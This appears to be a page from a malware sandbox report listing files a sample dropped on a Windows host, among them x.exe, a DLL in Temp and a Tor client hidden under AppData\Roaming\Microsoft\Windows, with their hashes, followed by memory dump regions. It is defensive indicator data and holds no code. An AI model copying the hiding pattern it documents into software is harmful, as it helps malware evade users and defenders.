MD5
a2a5a9b937771a4b82694c844fd27e36

SHA1
402e2f7bfe1f24d6ea048d58bf156676132f515d

SHA256
390126ab71cd12f414f4200cc246d5283c534ab216794ce9980048779960ea68

SHA512
d352b147c8f045f9931725d25166916ce081ac5cf251f2987fb011deed2e8d3e08f91dbce8a2464abab5561b7915d69cbb7a0d02437b30b6fd3d5622621149e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt

Filesize
722KB

MD5
43141e85e7c36e31b52b22ab94d5e574

SHA1
cfd7079a9b268d84b856dc668edbb9ab9ef35312

SHA256
ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d

SHA512
9119ae7500aa5cccf26a0f18fd8454245347e3c01dabba56a93dbaaab86535e62b1357170758f3b3445b8359e7dd5d37737318a5d8a6047c499d32d5b64126fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt

Filesize
14.6MB

MD5
cfe4b8f7535c958ea26cde6f32b559aa

SHA1
253ba3372c6c0b1c301f6e968c4fb7d5ffd696d0

SHA256
0afc8b7c47f48ef991535d435d48411ea12c4b98f14253a27b15ec6d7f020620

SHA512
01e8862cb7c1a3b247d09ca8e9f94c40232aaed93ab9f1937de0f69f83ba3d32926b6289b7bc5b8ae2bb06876b915a50ed65bb8ba10ffadcbbee579ce968bd39

Download Submit
C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml

Filesize
2KB

MD5
9160347bec74471e1a79edfd950629ae

SHA1
c149a7e5aab6e349a70b7b458d0eaaa9d301c790

SHA256
0fe356f3d04bb43f772604b049fd2b20f3038ca2ce84bf9778b8ccdd481d77ab

SHA512
b8061834f658567a1e742496c38688bdecd60191a92163d47470f64aa1fba23e92dd36fa1d2bb7efa36f14002c0606013973718b9f107e62d845a17be4b0d358

Download Submit
C:\Users\Admin\AppData\Local\Temp\asacpiex.dll

Filesize
14.6MB

MD5
2380aed7f261148fdb35af6688e408ee

SHA1
fa359778d16c934ba96b96f3c6c17a10a9e266b0

SHA256
12afa4813940c6985259f487d5e2892550596a60c6c77f806aefa2c254c74bb4

SHA512
646bdbc4f01991460755c6a2c2dbbca0a0170c83d06050ba50ec1b5406d58f8035498c84462dd9e6ab1d695b8854e2f4734d64ec2f4ab1083371fd145963bb85

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
18.1MB

MD5
efcd72ad2d3430248a68e5f960ed5e2b

SHA1
58cc7d2732f401b99926211c0dab319dfc0bba1a

SHA256
41686ad9f581037f44b72b37f8bee562512854fc6807c5a13ea1646cdeab61c8

SHA512
d50dd3628e0ed5b6040545e1a1836ffcdde30c4748b220efb7df29aa139b22b814d2466d6808c8dc3af765b9ce8092582720f69187a6562eefd6fca4cb9670e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

Filesize
11KB

MD5
5b9681c9dc6de4e1d51d13f2194e5791

SHA1
e9a2c3640632d8a225986f6aca12ed23d9cfaa37

SHA256
65a1d645fe00ce19098e2bc29e7f36b01d34e81794515b21f29344d77055a55a

SHA512
c694a6d47880afed6e9f1ffae75ae41162fdec8bc477e79cb1f3c96091185f02d2592476b0524dc7964690ed72198f1bc10f95a1abf5be1675bde410f7d356c2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

Filesize
2.6MB

MD5
21e3778b11e03ced442a1ac73d8949ee

SHA1
9e416a029a3c6e6738cba0d1f69253ca283b73ea

SHA256
03b7f47481eaf1f2c942f4a41a3a6411e22493c2d5b25ab1cab38ffe11cccb76

SHA512
20b91dea4e9f8f9dc8b672be51fb161f1b7a60fac9523921bc084f64c684f688070ec0e01c93f57294a7b13f5ecd33f9eac0eb22acd65b528162bfb08d0bd1a9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.txt

Filesize
15.8MB

MD5
7268eb05d51294219569569ea006da2a

SHA1
ade2c0a248f6aae9ff00f42e04dd3d1de242b289

SHA256
188b7e3f0135cf683c393ab88930e93f29d4a0c31c08841237afaf543ecb2e12

SHA512
0056df445e950fc3a76dcb64c4ab8c8b187436d18e95b916b7e83e7e215fa8371bae91501252b1a6e15dbc5414ae674381b758c84a2814d4c88bd856e3deef46

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp

Filesize
2.5MB

MD5
54183220aa6c777f8228474ff5b5df01

SHA1
ed438f17bffb37d42afd61d8dcef0c50d554c65c

SHA256
9a78c80e93bd1ed3d71eb090465e39a69470cd1812fc5e169d8b412e8c665963

SHA512
70b1e22449c5264bed46b62595206e3ad36e2a9c33fa9589acb792d499dcbbae5ebdbf3b35c140e72a7d594f807a6ce1ab925736b5e1a07c17a26445a2591987

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-certs

Filesize
20KB

MD5
ba05e28594faf7aebe88f9db4dbbb04f

SHA1
75caee5d32c9c8bf38629975ae092b9055ce571d

SHA256
d2c16cbbdd853ba8970137514a4ccea59818d1589f25671633fbf962bfb79ae6

SHA512
57c5d1ff1f0cfcba41ef416668cc392c54ec1cea7030ccfa1f31935174b649aff3219b5c7bb0abd11f6d693e559bb50a7fc49b0fbc09791f07d18de81d694120

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdesc-consensus

Filesize
2.7MB

MD5
ffcd5cbca9867eee8d74446c60ea6736

SHA1
1a14d9829b9ec3b18adbdca0f87df2fd34938992

SHA256
2089eed082364ed1e52980737b55c54c434f42fdf5048077b63e0dc5ee8e69c3

SHA512
e11ed7aab2389008bb02ed33cffaeeab18799acc1ebdecc9a84edc190a55dda41aa5543cc5d7a784e966cb3ab93973fe81a1b94db89e3600fff9017db083b6fb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

Filesize
5.9MB

MD5
1352e269f4d71c449802e6016e00fb20

SHA1
3bab677b341005c2ef463c1f12142110f68f8f9f

SHA256
df2680b09b77ef3dafb3cdca3ce2846e7123fef214184e381b40242226bc41e9

SHA512
ef825b4e7f6721348f0dd23400173180811005a58c1ab540c3c48efb592ea097932f48764c18489783a332d5db9e2f94fa76f75411c46fa545c55ce6e3fd4753

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

Filesize
20.4MB

MD5
6d8ae44432543ca60ef1615f02ce8af5

SHA1
859e3b49442d10c90b1a3851bd9cc7f161800bbb

SHA256
fc5b38c45d718b21c6870946e382673c2009351ceed2604fa090fc3ca6a45ec8

SHA512
36d06872552d5292142793715ef5ef3d47a389b4edcfe371ac5485c998995d320b205cc30a6578b83ae611c9e488019679969fa3a8c1478fd4d42188d0069edf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\state

Filesize
4KB

MD5
71bdbe37a1c137422e9f2899368d3350

SHA1
9ce3b1fbc11e77adddb1003224b540ef36a6dc95

SHA256
b000cbe3224dbdef7fb8fb3a297a1d746774134d31f064f75f665805ef722608

SHA512
c66bbc048d6ab0f4d5bc048eb430d5454fab2248c0200afa820b014263f13e0f95685ef45a6960903a1dfe64ccfbe8b09d0ff026f23231e8084f55af15e2ee01

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\Tor.pid

Filesize
6B

MD5
1328d2fd52b7b43d8dd5e86677e39fe3

SHA1
c38ac7362a615a346ecc76831bef1e4f147b2cdb

SHA256
542f2a23dd31393ddb4f5fcf7df05140f87c9a8fd3a52b16b347252f802c0af2

SHA512
ce5549ff40a8b2c174089e3e4adcad46e1b5cde44cb74a7d4ae0734235f204d04142dda416edb6a0c076560e6d912f101f62a6548be795486ebb9a5192931aec

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\TorConfig

Filesize
201B

MD5
b9d2fe9cfa840518fa39039c928d4938

SHA1
0561516b7cfa784cf400349983817c8b18817256

SHA256
69d57bfb46ef8097c1cfca65885790421d0e0965b7778f165cd7df9368807776

SHA512
894510d39a044a37325d73b8348860960b3a78c54e7cdf81357f4b50e8dcf5d47ab98c768e6439949ba835802b2a5e98314441127d9655b027caf246e09e013d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1-x64.dll

Filesize
3.4MB

MD5
791a48e7cf84ec1532d20127556f6300

SHA1
774f71e595cfc7e24dc941839566bc9edd9156c5

SHA256
af682ad107cf0e9d9f11adeaf88f817610988b56577c4020897debc0f98e26ff

SHA512
ecbb4a07bb68fec5258be0adc91b89d179b5668bbab3be3bd72d5339f8bf3b32a1860b38693a304029fe989bd92adb020cf755f673b1e59966dfc75e4f958cfa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_core-2-1-7.dll

Filesize
646KB

MD5
c1507e234ff7f11a259d87a57af740be

SHA1
7478ba561c9f478ede650561867ebd2db58da42f

SHA256
d6a7d46f6fc803b50460d03c0bc14f2f128ee2becabcf1713715bcebf13ee75b

SHA512
64d0657050028d846097429ad1268844038059279e1256329716b937338de5fc1b5f50f420b8aa781c5e2a19f15158f564569db639981fef10fa5e57dfd4717b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_extra-2-1-7.dll

Filesize
657KB

MD5
7cb2f0f4bba8d16c3200e9ac2a25b7c0

SHA1
63cf39682bf6876f563e1567df3c55fd5939e6ea

SHA256
ec52e90c68dd0e7603df3f9fe6c909d019a7e94dc3ce0efd8baf67864a43b74b

SHA512
7a660d87739914c68cadb56a4acbf27d68fd145b3bb65b957b4c767dfabe0762c40d58faa3a2df3b3453083ea658411c79d53be5166dda844782a9cd2617a264

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
ead6d4a87041e13b9041f78be1cb84d1

SHA1
896a336e08a1904537ee5a4a86eb0e885a18e17a

SHA256
b94b8981f8110944c5b03c9cba4066e9d0daa13687dead387bcbc772132c6d24

SHA512
34054ec79691145a8d511f9425f9ad44e07f8bfb38bd0b3251a5db3358c0055344615990fb770d4bdcbf04c9461847dfd4f6d2bac1e43ec815426a94d065c580

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssl-1_1-x64.dll

Filesize
965KB

MD5
7847c7b13b3414e8e7652880b4609205

SHA1
930670acc16157f56aaf69423e5d7705441764ba

SHA256
38200438cf0c9c20d17e5b9030d2ad2e4a1b6b9dc41c287bc603dd50d22e67bb

SHA512
c3c81dc3eb546c40b3606338deadbd63331659645dd24b5fd0d4fb3170b053fef528ee3fe005c9446176a5c049e9412ea8193ad2f8b9a7301ff67b088f1bbb6e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll

Filesize
313KB

MD5
97d89dec5f6a236b6832a5f3f43ab625

SHA1
18f2696a3bf4d19cac3b677d58ff5e51bf54b9e8

SHA256
c6dca12e0e896df5f9b2db7a502a50d80d4fb014d7ec2f2ceb897b1a81f46ead

SHA512
7e82d1e37dc822a67e08bd1d624d5492f5813a33ec64f13d22caef9db35ebb9bb9913582289ebdecad00e6b6148d750ae0b4437364ef056d732734255498be54

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll

Filesize
608KB

MD5
624304f2ba253b33c265ff2738a10eb9

SHA1
5a337e49dd07f0b6f7fc6341755dc9a298e8b220

SHA256
27b857131977106c4a71ce626225d52a3d6e2932cb6243cb83e47b8d592d0d4f

SHA512
163820961a64b3fda33969cbb320aa743edc7a6bacebe033054c942e7a1d063f096290a59fad1569c607666429e2f3133fcfe31ef37649f9da71b453ef775e5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
4.3MB

MD5
9f2d86da7d58a70b0003307d9cfc2438

SHA1
bd69ad6ea837e309232d7c4fd0e87e22c3266ac5

SHA256
7052619814a614a1b157c5c94a92dbec22b425a0977ac8b21958b8db81e2dd65

SHA512
ce345ff77d8043f416a04b782be8e7b0d5fdea933f3ac79abb88648a9fca23d7a69f537a825d0b636ba64f80afe70f758114ddbf412bd9398800ba4b6e359a99

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll

Filesize
974KB

MD5
be51ba4bea2d731dacf974c43941e457

SHA1
51fc479fd8ee9a2b72e6aa020ce5bb1c7a28f621

SHA256
98d06628e3d9c8097d239722e83ad78eb0b41b1e2f54d50a500da6d9292ff747

SHA512
6184accd206aa466278c2f4b514fd5c85820d47cf3a148904e93927621ac386890e657f09547b694c32ef23c355ae738b7c7d039fcd6c791529198c7b0b6bd1e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\zlib1.dll

Filesize
107KB

MD5
d490b6c224e332a706dd3cd210f32aa8

SHA1
1f0769e1fffddac3d14eb79f16508cb6cc272347

SHA256
da9185e45fdcbee17fcd9292979b20f32aa4c82bc2cb356b4c7278029e247557

SHA512
43ce8d4ee07d437aaca3f345af129ff5401f1f08b1292d1e320096ba41e2529f41ce9105e3901cb4ecb1e8fde12c9298819961b0e6896c69b62f5983df9b0da3

Download Submit
memory/532-3332-0x0000000002F00000-0x0000000002F20000-memory.dmp

Filesize
128KB

Download
memory/532-3339-0x0000000000190000-0x0000000000CA1000-memory.dmp

Filesize
11.1MB

Download
memory/532-3328-0x0000000000D00000-0x0000000000D20000-memory.dmp

Filesize
128KB

Download
memory/532-3327-0x0000000002CA0000-0x0000000002CC0000-memory.dmp

Filesize
128KB

Download
memory/532-3325-0x0000000000190000-0x0000000000CA1000-memory.dmp

Filesize
11.1MB

Download
memory/532-3331-0x0000000002DC0000-0x0000000002DE0000-memory.dmp

Filesize
128KB

Download
memory/532-3330-0x0000000002F20000-0x0000000002F40000-memory.dmp

Filesize
128KB

Download
memory/532-3329-0x0000000002DE0000-0x0000000002E00000-memory.dmp

Filesize
128KB

Download
memory/532-3342-0x0000000002CA0000-0x0000000002CC0000-memory.dmp

Filesize
128KB

Download
memory/532-3343-0x0000000000D00000-0x0000000000D20000-memory.dmp

Filesize
128KB

Download
memory/532-3344-0x0000000002DE0000-0x0000000002E00000-memory.dmp

Filesize
128KB

Download
memory/532-3345-0x0000000002F20000-0x0000000002F40000-memory.dmp

Filesize
128KB

Download
memory/532-3346-0x0000000002DC0000-0x0000000002DE0000-memory.dmp

Filesize
128KB

Download
memory/532-3347-0x0000000002F00000-0x0000000002F20000-memory.dmp

Filesize
128KB

Download
memory/1316-58-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/1316-54-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/1316-60-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/1316-50-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/1316-81-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/1316-52-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1876-3295-0x00000000004D0000-0x00000000005F3000-memory.dmp

Filesize
1.1MB

Download
memory/1876-3300-0x00000000004D0000-0x00000000005F3000-memory.dmp

Filesize
1.1MB

Download
memory/2204-33-0x00000000007E0000-0x00000000007E1000-memory.dmp

Filesize
4KB

Download
memory/2204-35-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/2204-40-0x0000000000E10000-0x0000000002036000-memory.dmp

Filesize
18.1MB

Download
memory/2204-34-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/2204-7-0x0000000000E10000-0x0000000002036000-memory.dmp

Filesize
18.1MB

Download
memory/2204-5-0x0000000000E10000-0x0000000002036000-memory.dmp

Filesize
18.1MB

Download
memory/2292-151-0x0000000000A90000-0x0000000000EF1000-memory.dmp

Filesize
4.4MB

Download
memory/2292-124-0x0000000074AF0000-0x0000000074B13000-memory.dmp

Filesize
140KB

Download
memory/2292-117-0x0000000000A90000-0x0000000000EF1000-memory.dmp

Filesize
4.4MB

Download
memory/2292-120-0x0000000074C00000-0x0000000074C98000-memory.dmp

Filesize
608KB

Download
memory/2292-119-0x0000000074CA0000-0x0000000074CF4000-memory.dmp

Filesize
336KB

Download
memory/2292-121-0x0000000074620000-0x000000007490D000-memory.dmp

Filesize
2.9MB

Download
memory/2292-123-0x0000000074B20000-0x0000000074BF3000-memory.dmp

Filesize
844KB

Download
memory/2292-118-0x0000000074D00000-0x0000000074DE3000-memory.dmp

Filesize
908KB

Download
memory/2292-134-0x0000000000A90000-0x0000000000EF1000-memory.dmp

Filesize
4.4MB

Download
memory/2292-144-0x0000000000A90000-0x0000000000EF1000-memory.dmp

Filesize
4.4MB

Download
memory/2292-393-0x0000000000A90000-0x0000000000EF1000-memory.dmp

Filesize
4.4MB

Download
memory/2292-158-0x0000000000A90000-0x0000000000EF1000-memory.dmp

Filesize
4.4MB

Download
memory/2292-172-0x0000000000A90000-0x0000000000EF1000-memory.dmp

Filesize
4.4MB

Download
memory/2292-759-0x0000000000A90000-0x0000000000EF1000-memory.dmp

Filesize
4.4MB

Download